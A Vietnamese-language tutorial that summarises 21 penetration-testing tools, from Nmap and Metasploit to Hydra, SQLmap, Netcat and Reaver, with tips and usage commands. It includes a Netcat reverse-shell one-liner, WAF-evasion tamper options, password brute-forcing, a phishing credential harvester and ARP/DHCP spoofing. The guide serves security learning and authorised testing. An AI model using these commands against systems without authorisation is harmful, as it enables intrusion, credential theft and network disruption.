
1. Nmap (Network Mapper)
Kiến thức cốt lõi: Nmap không chỉ quét cổng mà còn cung cấp thông tin chi tiết về hệ điều hành, phiên bản dịch vụ, và cấu hình mạng. Điểm mạnh nằm ở khả năng tùy chỉnh quét (scan types) và né tránh phát hiện (evasion). Lệnh -A mạnh nhưng chậm, nên tùy tình huống, bạn có thể dùng các tùy chọn như -sS (TCP SYN scan) để quét nhanh hoặc -sU cho UDP.
- Tác dụng: Khám phá mạng (network discovery) và lập bản đồ mục tiêu (target mapping).
- Thực hành: Sử dụng
--scriptđể chạy các script NSE (Nmap Scripting Engine) nhưnmap --script vuln <target_ip>để quét lỗ hổng. - Lưu ý: Quét không được phép trên mạng không sở hữu có thể vi phạm pháp luật.
Cách sử dụng:
Lệnh này thực hiện quét nâng cao, thu thập thông tin hệ điều hành, dịch vụ, và phiên bản.
nmap -A <target_ip>2. Metasploit Framework
Kiến thức cốt lõi: Metasploit là trung tâm của kiểm thử xâm nhập nhờ kho exploit khổng lồ và khả năng tùy chỉnh payload. Giá trị cốt lõi nằm ở quy trình: tìm kiếm exploit (search), cấu hình (set), và khai thác (exploit). Payload như meterpreter cho phép kiểm soát hệ thống từ xa với các lệnh mạnh mẽ (upload, download, keylogger).
- Tác dụng: Khai thác lỗ hổng nhanh chóng và tự động hóa kiểm thử.
- Thực hành: Dùng
use auxiliary/scannerđể quét trước khi khai thác, ví dụ:use auxiliary/scanner/smb/smb_versionđể kiểm tra dịch vụ SMB. - Lưu ý: Cập nhật thường xuyên (
msfupdate) để có exploit mới nhất.
Cách sử dụng:
msfconsoleSau khi mở giao diện, bạn có thể tìm kiếm các khai thác bằng:
search exploit <tên dịch vụ>3. Wireshark
Kiến thức cốt lõi: Wireshark cho phép phân tích lưu lượng mạng theo thời gian thực, với sức mạnh nằm ở bộ lọc (filter) như http, tcp.port == 80, hoặc ip.src == <IP>. Nó giúp phát hiện các gói tin bất thường (malicious traffic) hoặc phân tích giao thức chi tiết.
- Tác dụng: Phát hiện tấn công mạng (MITM, packet injection) và debug giao thức.
- Thực hành: Dùng bộ lọc hiển thị (
http.request) để tập trung vào lưu lượng HTTP hoặc lưu file pcap để phân tích sau. - Lưu ý: Cần hiểu cơ bản về giao thức mạng (TCP/IP, HTTP) để phân tích hiệu quả.
Cách sử dụng:
wiresharkChọn giao diện mạng để bắt đầu thu thập gói tin.
4. Aircrack-ng
Kiến thức cốt lõi: Aircrack-ng phá khóa Wi-Fi (WEP/WPA) bằng cách bắt handshake và brute force. Giá trị nằm ở bộ công cụ tích hợp: airmon-ng (chuyển card mạng sang chế độ monitor), airodump-ng (bắt gói tin), và aircrack-ng (phá khóa).
- Tác dụng: Kiểm tra bảo mật Wi-Fi và khai thác điểm yếu giao thức.
- Thực hành: Dùng
airodump-ng --bssid <BSSID> --channel <channel> wlan0monđể tập trung vào một AP cụ thể, tiết kiệm thời gian. - Lưu ý: Chỉ sử dụng trên mạng bạn có quyền, vì tấn công Wi-Fi trái phép là bất hợp pháp.
Cách sử dụng:
airmon-ng start wlan0
airodump-ng wlan0mon5. Hydra
Kiến thức cốt lõi: Hydra là công cụ brute force nhanh, hỗ trợ nhiều giao thức (SSH, FTP, HTTP). Giá trị nằm ở khả năng tùy chỉnh danh sách mật khẩu (-P) và tài khoản (-L), cùng tốc độ song song hóa cao.
- Tác dụng: Kiểm tra độ mạnh của mật khẩu dịch vụ.
- Thực hành: Dùng
-t 4để giới hạn số luồng, tránh khóa tài khoản do thử quá nhanh. - Lưu ý: Brute force dễ bị phát hiện bởi IDS/IPS, nên thử trên môi trường kiểm soát.
Cách sử dụng:
hydra -l admin -P passwords.txt <target_ip> ssh6. John the Ripper
Kiến thức cốt lõi: John phá mật khẩu bằng cách thử từ điển (wordlist) hoặc biến đổi thông minh (rules). Giá trị nằm ở khả năng xử lý nhiều định dạng hash (MD5, SHA, NTLM) và tối ưu tốc độ trên CPU.
- Tác dụng: Phục hồi mật khẩu từ file hash bị rò rỉ.
- Thực hành: Dùng
--format=<hash_type>để chỉ định loại hash, ví dụ:john --format=md5crypt hashfile. - Lưu ý: Kết hợp với wordlist chất lượng (như rockyou.txt) để tăng hiệu quả.
Cách sử dụng:
john --wordlist=password.lst hashfile7. SQLmap
Kiến thức cốt lõi: SQLmap tự động hóa khai thác SQL Injection, từ phát hiện lỗ hổng đến trích xuất dữ liệu (database, tables, columns). Giá trị nằm ở các tùy chọn như --dbs, --dump, và khả năng vượt qua WAF.
- Tác dụng: Kiểm tra bảo mật ứng dụng web.
- Thực hành: Dùng
--tamper(nhưtamper=space2comment) để né các bộ lọc WAF. - Lưu ý: Chỉ thử trên mục tiêu được phép, vì khai thác SQL Injection có thể gây hại.
Cách sử dụng:
sqlmap -u "http://target.com/page.php?id=1" --dbs8. Burp Suite
Kiến thức cốt lõi: Burp Suite là công cụ all-in-one cho kiểm thử web, với Proxy (chặn và sửa request), Scanner (quét lỗ hổng), và Intruder (brute force). Giá trị nằm ở khả năng tùy chỉnh request và phân tích phản hồi.
- Tác dụng: Phát hiện lỗ hổng web (XSS, CSRF, SQLi).
- Thực hành: Cấu hình Proxy trên trình duyệt và dùng Intruder để thử các payload (ví dụ: danh sách ID).
- Lưu ý: Phiên bản Community miễn phí đủ dùng, nhưng Scanner chỉ có trong bản Pro.
Cách sử dụng:
burpsuite9. Nikto
Kiến thức cốt lõi: Nikto quét máy chủ web để tìm cấu hình sai, lỗ hổng phổ biến, và file nhạy cảm. Giá trị nằm ở tốc độ và cơ sở dữ liệu lỗ hổng tích hợp.
- Tác dụng: Kiểm tra nhanh bảo mật máy chủ web.
- Thực hành: Dùng
-Tuningđể tùy chỉnh loại quét, ví dụ:nikto -h target.com -Tuning xđể bỏ qua kiểm tra không cần thiết. - Lưu ý: Nikto tạo nhiều request, dễ bị phát hiện bởi WAF.
Cách sử dụng:
nikto -h http://target.com10. Netcat
Kiến thức cốt lõi: Netcat là “con dao Thụy Sĩ” của mạng, cho phép tạo kết nối TCP/UDP, chuyển file, hoặc tạo shell ngược. Giá trị nằm ở sự đơn giản và linh hoạt.
- Tác dụng: Kiểm tra cổng và thiết lập kết nối từ xa.
- Thực hành: Dùng
nc -e /bin/sh <ip> <port>để tạo shell (trên Linux). - Lưu ý: Một số hệ thống giới hạn
nc, cần kiểm tra trước.
Cách sử dụng:
nc -lvp 444411. TheHarvester
Kiến thức cốt lõi: TheHarvester thu thập email, subdomain, và thông tin OSINT từ Google, Bing, Shodan. Giá trị nằm ở khả năng lập bản đồ mục tiêu trước khi tấn công.
- Tác dụng: Tăng hiệu quả reconnaissance (thu thập thông tin).
- Thực hành: Dùng
-b allđể quét từ nhiều nguồn, ví dụ:theharvester -d target.com -b all. - Lưu ý: Tôn trọng chính sách của công cụ tìm kiếm để tránh bị chặn.
Cách sử dụng:
theharvester -d target.com -b google12. Maltego
Kiến thức cốt lõi: Maltego trực quan hóa mối quan hệ giữa các thực thể (email, domain, IP) qua đồ thị. Giá trị nằm ở các transform (chuyển đổi dữ liệu) để khám phá thông tin ẩn.
- Tác dụng: Phân tích OSINT chuyên sâu.
- Thực hành: Bắt đầu với domain, dùng transform như “To Emails” để tìm email liên quan.
- Lưu ý: Phiên bản miễn phí giới hạn số transform, cần đăng ký để dùng đầy đủ.
Cách sử dụng:
maltego13. WPScan
Kiến thức cốt lõi: WPScan chuyên quét lỗ hổng WordPress (plugin, theme, user). Giá trị nằm ở cơ sở dữ liệu lỗ hổng và khả năng liệt kê user (--enumerate u).
- Tác dụng: Kiểm tra bảo mật website WordPress.
- Thực hành: Dùng
--api-tokenđể tăng giới hạn quét với API miễn phí. - Lưu ý: Chỉ quét mục tiêu được phép để tránh vi phạm.
Cách sử dụng:
wpscan --url http://target.com --enumerate vp14. SET (Social Engineering Toolkit)
Kiến thức cốt lõi: SET tự động hóa tấn công kỹ thuật xã hội như giả mạo website hoặc email phishing. Giá trị nằm ở các template sẵn có và tích hợp với Metasploit.
- Tác dụng: Kiểm tra nhận thức bảo mật của người dùng.
- Thực hành: Dùng “Website Attack Vectors” và chọn “Credential Harvester” để giả mạo login page.
- Lưu ý: Cần môi trường thử nghiệm hợp pháp.
Cách sử dụng:
setoolkit15. Ettercap
Kiến thức cốt lõi: Ettercap thực hiện MITM qua ARP spoofing hoặc DNS spoofing. Giá trị nằm ở khả năng chặn và sửa gói tin trong mạng nội bộ.
- Tác dụng: Kiểm tra bảo mật mạng LAN.
- Thực hành: Dùng
-M arp:remoteđể spoof cả gateway và mục tiêu. - Lưu ý: Cần quyền root và hiểu cấu trúc mạng.
Cách sử dụng:
ettercap -G16. Yersinia
Kiến thức cốt lõi: Yersinia tấn công các giao thức layer 2 (STP, DHCP, VLAN). Giá trị nằm ở khả năng phá vỡ cấu trúc mạng hoặc thu thập thông tin.
- Tác dụng: Kiểm tra bảo mật giao thức mạng.
- Thực hành: Dùng
yersinia dhcp -attack 1để gửi DHCP giả mạo. - Lưu ý: Dùng cẩn thận vì có thể làm gián đoạn mạng.
Cách sử dụng:
yersinia -G17. Fierce
Kiến thức cốt lõi: Fierce quét DNS để tìm subdomain và IP liên quan. Giá trị nằm ở khả năng phát hiện các máy chủ ẩn trong mạng mục tiêu.
- Tác dụng: Thu thập thông tin mạng trước tấn công.
- Thực hành: Dùng
--wordlistđể brute force subdomain. - Lưu ý: Kết hợp với TheHarvester để có kết quả toàn diện.
Cách sử dụng:
fierce -dns target.com18. Hashcat
Kiến thức cốt lõi: Hashcat là công cụ phá hash nhanh nhất nhờ tận dụng GPU. Giá trị nằm ở hỗ trợ nhiều thuật toán (-m) và các chế độ tấn công (dictionary, mask, hybrid).
- Tác dụng: Phục hồi mật khẩu từ hash.
- Thực hành: Dùng
-a 3để brute force với mask, ví dụ:hashcat -m 0 -a 3 hashfile ?d?d?d?d. - Lưu ý: Cần GPU mạnh để tối ưu tốc độ.
Cách sử dụng:
hashcat -m 0 hashfile rockyou.txt19. Exploit Database (searchsploit)
Kiến thức cốt lõi: Searchsploit tìm kiếm exploit từ cơ sở dữ liệu Exploit-DB. Giá trị nằm ở tốc độ truy cập offline và khả năng lọc theo nền tảng/dịch vụ.
- Tác dụng: Nghiên cứu exploit nhanh chóng.
- Thực hành: Dùng
-pđể xem chi tiết exploit, ví dụ:searchsploit -p apache. - Lưu ý: Kiểm tra exploit trước khi dùng, vì một số có thể không ổn định.
Cách sử dụng:
searchsploit apache20. Reaver
Kiến thức cốt lõi: Reaver khai thác WPS để lấy khóa Wi-Fi WPA/WPA2. Giá trị nằm ở khả năng phá khóa mà không cần handshake.
- Tác dụng: Kiểm tra bảo mật WPS.
- Thực hành: Dùng
-Sđể giảm lỗi khi tấn công, ví dụ:reaver -i wlan0mon -b <BSSID> -S. - Lưu ý: WPS hiện ít được dùng, nên kiểm tra trước.
Cách sử dụng:
reaver -i wlan0mon -b <BSSID> -vv21. Armitage
Kiến thức cốt lõi: Armitage cung cấp giao diện đồ họa cho Metasploit, giúp trực quan hóa mạng và tự động hóa khai thác. Giá trị nằm ở khả năng quản lý nhiều session cùng lúc.
- Tác dụng: Tăng tốc kiểm thử xâm nhập.
- Thực hành: Dùng “Attacks” để tìm exploit tự động sau khi quét mạng.
- Lưu ý: Yêu cầu Metasploit cài sẵn.
Cách sử dụng:
armitage
